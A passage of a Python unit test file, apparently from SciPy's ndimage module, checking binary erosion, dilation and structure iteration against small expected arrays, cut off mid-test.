def test_iterate_structure02(self):
struct = [[0, 1],
[1, 1],
[0, 1]]
out = ndimage.iterate_structure(struct, 2)
assert_array_almost_equal(out, [[0, 0, 1],
[0, 1, 1],
[1, 1, 1],
[0, 1, 1],
[0, 0, 1]])
def test_iterate_structure03(self):
struct = [[0, 1, 0],
[1, 1, 1],
[0, 1, 0]]
out = ndimage.iterate_structure(struct, 2, 1)
expected = [[0, 0, 1, 0, 0],
[0, 1, 1, 1, 0],
[1, 1, 1, 1, 1],
[0, 1, 1, 1, 0],
[0, 0, 1, 0, 0]]
assert_array_almost_equal(out[0], expected)
assert_equal(out[1], [2, 2])
def test_binary_erosion01(self):
for type_ in self.types:
data = numpy.ones([], type_)
out = ndimage.binary_erosion(data)
assert_array_almost_equal(out, 1)
def test_binary_erosion02(self):
for type_ in self.types:
data = numpy.ones([], type_)
out = ndimage.binary_erosion(data, border_value=1)
assert_array_almost_equal(out, 1)
def test_binary_erosion03(self):
for type_ in self.types:
data = numpy.ones([1], type_)
out = ndimage.binary_erosion(data)
assert_array_almost_equal(out, [0])
def test_binary_erosion04(self):
for type_ in self.types:
data = numpy.ones([1], type_)
out = ndimage.binary_erosion(data, border_value=1)
assert_array_almost_equal(out, [1])
def test_binary_erosion05(self):
for type_ in self.types:
data = numpy.ones([3], type_)
out = ndimage.binary_erosion(data)
assert_array_almost_equal(out, [0, 1, 0])
def test_binary_erosion06(self):
for type_ in self.types:
data = numpy.ones([3], type_)
out = ndimage.binary_erosion(data, border_value=1)
assert_array_almost_equal(out, [1, 1, 1])
def test_binary_erosion07(self):
for type_ in self.types:
data = numpy.ones([5], type_)
out = ndimage.binary_erosion(data)
assert_array_almost_equal(out, [0, 1, 1, 1, 0])
def test_binary_erosion08(self):
for type_ in self.types:
data = numpy.ones([5], type_)
out = ndimage.binary_erosion(data, border_value=1)
assert_array_almost_equal(out, [1, 1, 1, 1, 1])
def test_binary_erosion09(self):
for type_ in self.types:
data = numpy.ones([5], type_)
data[2] = 0
out = ndimage.binary_erosion(data)
assert_array_almost_equal(out, [0, 0, 0, 0, 0])
def test_binary_erosion10(self):
for type_ in self.types:
data = numpy.ones([5], type_)
data[2] = 0
out = ndimage.binary_erosion(data, border_value=1)
assert_array_almost_equal(out, [1, 0, 0, 0, 1])
def test_binary_erosion11(self):
for type_ in self.types:
data = numpy.ones([5], type_)
data[2] = 0
struct = [1, 0, 1]
out = ndimage.binary_erosion(data, struct, border_value=1)
assert_array_almost_equal(out, [1, 0, 1, 0, 1])
def test_binary_erosion12(self):
for type_ in self.types:
data = numpy.ones([5], type_)
data[2] = 0
struct = [1, 0, 1]
out = ndimage.binary_erosion(data, struct, border_value=1,
origin=-1)
assert_array_almost_equal(out, [0, 1, 0, 1, 1])
def test_binary_erosion13(self):
for type_ in self.types:
data = numpy.ones([5], type_)
data[2] = 0
struct = [1, 0, 1]
out = ndimage.binary_erosion(data, struct, border_value=1,
origin=1)
assert_array_almost_equal(out, [1, 1, 0, 1, 0])
def test_binary_erosion14(self):
for type_ in self.types:
data = numpy.ones([5], type_)
data[2] = 0
struct = [1, 1]
out = ndimage.binary_erosion(data, struct, border_value=1)
assert_array_almost_equal(out, [1, 1, 0, 0, 1])
def test_binary_erosion15(self):
for type_ in self.types:
data = numpy.ones([5], type_)
data[2] = 0
struct = [1, 1]
out = ndimage.binary_erosion(data, struct, border_value=1,
origin=-1)
assert_array_almost_equal(out, [1, 0, 0, 1, 1])
def test_binary_erosion16(self):
for type_ in self.types:
data = numpy.ones([1, 1], type_)
out = ndimage.binary_erosion(data, border_value=1)
assert_array_almost_equal(out, [[1]])
def test_binary_erosion17(self):
for type_ in self.types:
data = numpy.ones([1, 1], type_)
out = ndimage.binary_erosion(data)
assert_array_almost_equal(out, [[0]])
def test_binary_erosion18(self):
for type_ in self.types:
data = numpy.ones([1, 3], type_)
out = ndimage.binary_erosion(data)
assert_array_almost_equal(out, [[0, 0, 0]])
def test_binary_erosion19(self):
for type_ in self.types:
data = numpy.ones([1, 3], type_)
out = ndimage.binary_erosion(data, border_value=1)
assert_array_almost_equal(out, [[1, 1, 1]])
def test_binary_erosion20(self):
for type_ in self.types:
data = numpy.ones([3, 3], type_)
out = ndimage.binary_erosion(data)
assert_array_almost_equal(out, [[0, 0, 0],
[0, 1, 0],
[0, 0, 0]])
def test_binary_erosion21(self):
for type_ in self.types:
data = numpy.ones([3, 3], type_)
out = ndimage.binary_erosion(data, border_value=1)
assert_array_almost_equal(out, [[1, 1, 1],
[1, 1, 1],
[1, 1, 1]])
def test_binary_erosion22(self):
expected = [[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 0, 0],
[0, 0, 0, 1, 1, 0, 0, 0],
[0, 0, 1, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]]
for type_ in self.types:
data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 1, 1],
[0, 0, 1, 1, 1, 1, 1, 1],
[0, 0, 1, 1, 1, 1, 0, 0],
[0, 1, 1, 1, 1, 1, 1, 0],
[0, 1, 1, 0, 0, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0]], type_)
out = ndimage.binary_erosion(data, border_value=1)
assert_array_almost_equal(out, expected)
def test_binary_erosion23(self):
struct = ndimage.generate_binary_structure(2, 2)
expected = [[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]]
for type_ in self.types:
data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 1, 1],
[0, 0, 1, 1, 1, 1, 1, 1],
[0, 0, 1, 1, 1, 1, 0, 0],
[0, 1, 1, 1, 1, 1, 1, 0],
[0, 1, 1, 0, 0, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0]], type_)
out = ndimage.binary_erosion(data, struct, border_value=1)
assert_array_almost_equal(out, expected)
def test_binary_erosion24(self):
struct = [[0, 1],
[1, 1]]
expected = [[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 1, 1],
[0, 0, 0, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 1, 0, 0],
[0, 0, 1, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0]]
for type_ in self.types:
data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 1, 1],
[0, 0, 1, 1, 1, 1, 1, 1],
[0, 0, 1, 1, 1, 1, 0, 0],
[0, 1, 1, 1, 1, 1, 1, 0],
[0, 1, 1, 0, 0, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0]], type_)
out = ndimage.binary_erosion(data, struct, border_value=1)
assert_array_almost_equal(out, expected)
def test_binary_erosion25(self):
struct = [[0, 1, 0],
[1, 0, 1],
[0, 1, 0]]
expected = [[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 0, 0],
[0, 0, 0, 1, 0, 0, 0, 0],
[0, 0, 1, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]]
for type_ in self.types:
data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 1, 1],
[0, 0, 1, 1, 1, 0, 1, 1],
[0, 0, 1, 0, 1, 1, 0, 0],
[0, 1, 0, 1, 1, 1, 1, 0],
[0, 1, 1, 0, 0, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0]], type_)
out = ndimage.binary_erosion(data, struct, border_value=1)
assert_array_almost_equal(out, expected)
def test_binary_erosion26(self):
struct = [[0, 1, 0],
[1, 0, 1],
[0, 1, 0]]
expected = [[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 1, 0, 0, 1],
[0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 1]]
for type_ in self.types:
data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 1, 1],
[0, 0, 1, 1, 1, 0, 1, 1],
[0, 0, 1, 0, 1, 1, 0, 0],
[0, 1, 0, 1, 1, 1, 1, 0],
[0, 1, 1, 0, 0, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0]], type_)
out = ndimage.binary_erosion(data, struct, border_value=1,
origin=(-1, -1))
assert_array_almost_equal(out, expected)
def test_binary_erosion27(self):
struct = [[0, 1, 0],
[1, 1, 1],
[0, 1, 0]]
expected = [[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0]]
data = numpy.array([[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 0, 0, 0],
[0, 0, 1, 1, 1, 0, 0],
[0, 1, 1, 1, 1, 1, 0],
[0, 0, 1, 1, 1, 0, 0],
[0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0]], bool)
out = ndimage.binary_erosion(data, struct, border_value=1,
iterations=2)
assert_array_almost_equal(out, expected)
def test_binary_erosion28(self):
struct = [[0, 1, 0],
[1, 1, 1],
[0, 1, 0]]
expected = [[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0]]
data = numpy.array([[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 0, 0, 0],
[0, 0, 1, 1, 1, 0, 0],
[0, 1, 1, 1, 1, 1, 0],
[0, 0, 1, 1, 1, 0, 0],
[0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0]], bool)
out = numpy.zeros(data.shape, bool)
ndimage.binary_erosion(data, struct, border_value=1,
iterations=2, output=out)
assert_array_almost_equal(out, expected)
def test_binary_erosion29(self):
struct = [[0, 1, 0],
[1, 1, 1],
[0, 1, 0]]
expected = [[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0]]
data = numpy.array([[0, 0, 0, 1, 0, 0, 0],
[0, 0, 1, 1, 1, 0, 0],
[0, 1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 1, 0],
[0, 0, 1, 1, 1, 0, 0],
[0, 0, 0, 1, 0, 0, 0]], bool)
out = ndimage.binary_erosion(data, struct,
border_value=1, iterations=3)
assert_array_almost_equal(out, expected)
def test_binary_erosion30(self):
struct = [[0, 1, 0],
[1, 1, 1],
[0, 1, 0]]
expected = [[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0]]
data = numpy.array([[0, 0, 0, 1, 0, 0, 0],
[0, 0, 1, 1, 1, 0, 0],
[0, 1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 1, 0],
[0, 0, 1, 1, 1, 0, 0],
[0, 0, 0, 1, 0, 0, 0]], bool)
out = numpy.zeros(data.shape, bool)
ndimage.binary_erosion(data, struct, border_value=1,
iterations=3, output=out)
assert_array_almost_equal(out, expected)
# test with output memory overlap
ndimage.binary_erosion(data, struct, border_value=1,
iterations=3, output=data)
assert_array_almost_equal(data, expected)
def test_binary_erosion31(self):
struct = [[0, 1, 0],
[1, 1, 1],
[0, 1, 0]]
expected = [[0, 0, 1, 0, 0, 0, 0],
[0, 1, 1, 1, 0, 0, 0],
[1, 1, 1, 1, 1, 0, 1],
[0, 1, 1, 1, 0, 0, 0],
[0, 0, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 0, 0, 1]]
data = numpy.array([[0, 0, 0, 1, 0, 0, 0],
[0, 0, 1, 1, 1, 0, 0],
[0, 1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 1, 0],
[0, 0, 1, 1, 1, 0, 0],
[0, 0, 0, 1, 0, 0, 0]], bool)
out = numpy.zeros(data.shape, bool)
ndimage.binary_erosion(data, struct, border_value=1,
iterations=1, output=out, origin=(-1, -1))
assert_array_almost_equal(out, expected)
def test_binary_erosion32(self):
struct = [[0, 1, 0],
[1, 1, 1],
[0, 1, 0]]
expected = [[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0]]
data = numpy.array([[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 0, 0, 0],
[0, 0, 1, 1, 1, 0, 0],
[0, 1, 1, 1, 1, 1, 0],
[0, 0, 1, 1, 1, 0, 0],
[0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0]], bool)
out = ndimage.binary_erosion(data, struct,
border_value=1, iterations=2)
assert_array_almost_equal(out, expected)
def test_binary_erosion33(self):
struct = [[0, 1, 0],
[1, 1, 1],
[0, 1, 0]]
expected = [[0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0]]
mask = [[1, 1, 1, 1, 1, 0, 0],
[1, 1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1]]
data = numpy.array([[0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 1, 0, 0, 1],
[0, 0, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 0, 0],
[0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0]], bool)
out = ndimage.binary_erosion(data, struct,
border_value=1, mask=mask, iterations=-1)
assert_array_almost_equal(out, expected)
def test_binary_erosion34(self):
struct = [[0, 1, 0],
[1, 1, 1],
[0, 1, 0]]
expected = [[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 1, 0, 0, 0],
[0, 1, 1, 1, 1, 1, 0],
[0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0]]
mask = [[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 1, 0, 0],
[0, 0, 1, 0, 1, 0, 0],
[0, 0, 1, 1, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0]]
data = numpy.array([[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 0, 0, 0],
[0, 0, 1, 1, 1, 0, 0],
[0, 1, 1, 1, 1, 1, 0],
[0, 0, 1, 1, 1, 0, 0],
[0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0]], bool)
out = ndimage.binary_erosion(data, struct,
border_value=1, mask=mask)
assert_array_almost_equal(out, expected)
def test_binary_erosion35(self):
struct = [[0, 1, 0],
[1, 1, 1],
[0, 1, 0]]
mask = [[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 1, 0, 0],
[0, 0, 1, 0, 1, 0, 0],
[0, 0, 1, 1, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0]]
data = numpy.array([[0, 0, 0, 1, 0, 0, 0],
[0, 0, 1, 1, 1, 0, 0],
[0, 1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 1, 0],
[0, 0, 1, 1, 1, 0, 0],
[0, 0, 0, 1, 0, 0, 0]], bool)
tmp = [[0, 0, 1, 0, 0, 0, 0],
[0, 1, 1, 1, 0, 0, 0],
[1, 1, 1, 1, 1, 0, 1],
[0, 1, 1, 1, 0, 0, 0],
[0, 0, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 0, 0, 1]]
expected = numpy.logical_and(tmp, mask)
tmp = numpy.logical_and(data, numpy.logical_not(mask))
expected = numpy.logical_or(expected, tmp)
out = numpy.zeros(data.shape, bool)
ndimage.binary_erosion(data, struct, border_value=1,
iterations=1, output=out,
origin=(-1, -1), mask=mask)
assert_array_almost_equal(out, expected)
def test_binary_erosion36(self):
struct = [[0, 1, 0],
[1, 0, 1],
[0, 1, 0]]
mask = [[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 1, 0, 0, 0],
[0, 0, 1, 0, 1, 0, 0, 0],
[0, 0, 1, 1, 1, 0, 0, 0],
[0, 0, 1, 1, 1, 0, 0, 0],
[0, 0, 1, 1, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]]
tmp = [[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 1, 0, 0, 1],
[0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 1]]
data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 1, 1],
[0, 0, 1, 1, 1, 0, 1, 1],
[0, 0, 1, 0, 1, 1, 0, 0],
[0, 1, 0, 1, 1, 1, 1, 0],
[0, 1, 1, 0, 0, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0]])
expected = numpy.logical_and(tmp, mask)
tmp = numpy.logical_and(data, numpy.logical_not(mask))
expected = numpy.logical_or(expected, tmp)
out = ndimage.binary_erosion(data, struct, mask=mask,
border_value=1, origin=(-1, -1))
assert_array_almost_equal(out, expected)
def test_binary_erosion37(self):
a = numpy.array([[1, 0, 1],
[0, 1, 0],
[1, 0, 1]], dtype=bool)
b = numpy.zeros_like(a)
out = ndimage.binary_erosion(a, structure=a, output=b, iterations=0,
border_value=True, brute_force=True)
assert_(out is b)
assert_array_equal(
ndimage.binary_erosion(a, structure=a, iterations=0,
border_value=True),
b)
def test_binary_erosion38(self):
data = numpy.array([[1, 0, 1],
[0, 1, 0],
[1, 0, 1]], dtype=bool)
iterations = 2.0
with assert_raises(TypeError):
_ = ndimage.binary_erosion(data, iterations=iterations)
def test_binary_erosion39(self):
iterations = numpy.int32(3)
struct = [[0, 1, 0],
[1, 1, 1],
[0, 1, 0]]
expected = [[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0]]
data = numpy.array([[0, 0, 0, 1, 0, 0, 0],
[0, 0, 1, 1, 1, 0, 0],
[0, 1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 1, 0],
[0, 0, 1, 1, 1, 0, 0],
[0, 0, 0, 1, 0, 0, 0]], bool)
out = numpy.zeros(data.shape, bool)
ndimage.binary_erosion(data, struct, border_value=1,
iterations=iterations, output=out)
assert_array_almost_equal(out, expected)
def test_binary_erosion40(self):
iterations = numpy.int64(3)
struct = [[0, 1, 0],
[1, 1, 1],
[0, 1, 0]]
expected = [[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0]]
data = numpy.array([[0, 0, 0, 1, 0, 0, 0],
[0, 0, 1, 1, 1, 0, 0],
[0, 1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 1, 0],
[0, 0, 1, 1, 1, 0, 0],
[0, 0, 0, 1, 0, 0, 0]], bool)
out = numpy.zeros(data.shape, bool)
ndimage.binary_erosion(data, struct, border_value=1,
iterations=iterations, output=out)
assert_array_almost_equal(out, expected)
def test_binary_dilation01(self):
for type_ in self.types:
data = numpy.ones([], type_)
out = ndimage.binary_dilation(data)
assert_array_almost_equal(out, 1)
def test_binary_dilation02(self):
for type_ in self.types:
data = numpy.zeros([], type_)
out = ndimage.binary_dilation(data)
assert_array_almost_equal(out, 0)
def test_binary_dilation03(self):
for type_ in self.types:
data = numpy.ones([1], type_)
out = ndimage.binary_dilation(data)
assert_array_almost_equal(out, [1])
def test_binary_dilation04(self):
for type_ in self.types:
data = numpy.zeros([1], type_)
out = ndimage.binary_dilation(data)
assert_array_almost_equal(out, [0])
def test_binary_dilation05(self):
for type_ in self.types:
data = numpy.ones([3], type_)
out = ndimage.binary_dilation(data)
assert_array_almost_equal(out, [1, 1, 1])
def test_binary_dilation06(self):
for type_ in self.types:
data = numpy.zeros([3], type_)
out = ndimage.binary_dilation(data)
assert_array_almost_equal(out, [0, 0, 0])
def test_binary_dilation07(self):
for type_ in self.types:
data = numpy.zeros([3], type_)
data[1] = 1
out = ndimage.binary_dilation(data)
assert_array_almost_equal(out, [1, 1, 1])
def test_binary_dilation08(self):
for type_ in self.types:
data = numpy.zeros([5], type_)
data[1] = 1
data[3] = 1
out = ndimage.binary_dilation(data)
assert_array_almost_equal(out, [1, 1, 1, 1, 1])
def test_binary_dilation09(self):
for type_ in self.types:
data = numpy.zeros([5], type_)
data[1] = 1
out = ndimage.binary_dilation(data)
assert_array_almost_equal(out, [1, 1, 1, 0, 0])
def test_binary_dilation10(self):
for type_ in self.types:
data = numpy.zeros([5], type_)
data[1] = 1
out = ndimage.binary_dilation(data, origin=-1)
assert_array_almost_equal(out, [0, 1, 1, 1, 0])
def test_binary_dilation11(self):
for type_ in self.types:
data = numpy.zeros([5], type_)
data[1] = 1
out = ndimage.binary_dilation(data, origin=1)
assert_array_almost_equal(out, [1, 1, 0, 0, 0])
def test_binary_dilation12(self):
for type_ in self.types:
data = numpy.zeros([5], type_)
data[1] = 1
struct = [1, 0, 1]
out = ndimage.binary_dilation(data, struct)
assert_array_almost_equal(out, [1, 0, 1, 0, 0])
def test_binary_dilation13(self):
for type_ in self.types:
data = numpy.zeros([5], type_)
data[1] = 1
struct = [1, 0, 1]
out = ndimage.binary_dilation(data, struct, border_value=1)
assert_array_almost_equal(out, [1, 0, 1, 0, 1])
def test_binary_dilation14(self):
for type_ in self.types:
data = numpy.zeros([5], type_)
data[1] = 1
struct = [1, 0, 1]
out = ndimage.binary_dilation(data, struct, origin=-1)
assert_array_almost_equal(out, [0, 1, 0, 1, 0])
def test_binary_dilation15(self):
for type_ in self.types:
data = numpy.zeros([5], type_)
data[1] = 1
struct = [1, 0, 1]
out = ndimage.binary_dilation(data, struct,
origin=-1, border_value=1)
assert_array_almost_equal(out, [1, 1, 0, 1, 0])
def test_binary_dilation16(self):
for type_ in self.types:
data = numpy.ones([1, 1], type_)
out = ndimage.binary_dilation(data)
assert_array_almost_equal(out, [[1]])
def test_binary_dilation17(self):
for type_ in self.types:
data = numpy.zeros([1, 1], type_)
out = ndimage.binary_dilation(data)
assert_array_almost_equal(out, [[0]])
def test_binary_dilation18(self):
for type_ in self.types:
data = numpy.ones([1, 3], type_)
out = ndimage.binary_dilation(data)
assert_array_almost_equal(out, [[1, 1, 1]])
def test_binary_dilation19(self):
for type_ in self.types:
data = numpy.ones([3, 3], type_)
out = ndimage.binary_dilation(data)
assert_array_almost_equal(out, [[1, 1, 1],
[1, 1, 1],
[1, 1, 1]])
def test_binary_dilation20(self):
for type_ in self.types:
data = numpy.zeros([3, 3], type_)
data[1, 1] = 1
out = ndimage.binary_dilation(data)
assert_array_almost_equal(out, [[0, 1, 0],
[1, 1, 1],
[0, 1, 0]])
def test_binary_dilation21(self):
struct = ndimage.generate_binary_structure(2, 2)
for type_ in self.types:
data = numpy.zeros([3, 3], type_)
data[1, 1] = 1
out = ndimage.binary_dilation(data, struct)
assert_array_almost_equal(out, [[1, 1, 1],
[1, 1, 1],
[1, 1, 1]])
def test_binary_dilation22(self):
expected = [[0, 1, 0, 0, 0, 0, 0, 0],
[1, 1, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 1, 0, 0],
[0, 0, 0, 1, 1, 1, 1, 0],
[0, 0, 1, 1, 1, 1, 0, 0],
[0, 1, 1, 1, 1, 1, 1, 0],
[0, 0, 1, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]]
for type_ in self.types:
data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 0, 0],
[0, 0, 0, 1, 1, 0, 0, 0],
[0, 0, 1, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]], type_)
out = ndimage.binary_dilation(data)
assert_array_almost_equal(out, expected)
def test_binary_dilation23(self):
expected = [[1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 0, 0, 0, 0, 1],
[1, 1, 0, 0, 0, 1, 0, 1],
[1, 0, 0, 1, 1, 1, 1, 1],
[1, 0, 1, 1, 1, 1, 0, 1],
[1, 1, 1, 1, 1, 1, 1, 1],
[1, 0, 1, 0, 0, 1, 0, 1],
[1, 1, 1, 1, 1, 1, 1, 1]]
for type_ in self.types:
data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 0, 0],
[0, 0, 0, 1, 1, 0, 0, 0],
[0, 0, 1, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]], type_)
out = ndimage.binary_dilation(data, border_value=1)
assert_array_almost_equal(out, expected)
def test_binary_dilation24(self):
expected = [[1, 1, 0, 0, 0, 0, 0, 0],
[1, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 1, 1, 1, 1, 0, 0],
[0, 1, 1, 1, 1, 0, 0, 0],
[1, 1, 1, 1, 1, 1, 0, 0],
[0, 1, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]]
for type_ in self.types:
data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 0, 0],
[0, 0, 0, 1, 1, 0, 0, 0],
[0, 0, 1, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]], type_)
out = ndimage.binary_dilation(data, origin=(1, 1))
assert_array_almost_equal(out, expected)
def test_binary_dilation25(self):
expected = [[1, 1, 0, 0, 0, 0, 1, 1],
[1, 0, 0, 0, 1, 0, 1, 1],
[0, 0, 1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 0, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1],
[0, 1, 0, 0, 1, 0, 1, 1],
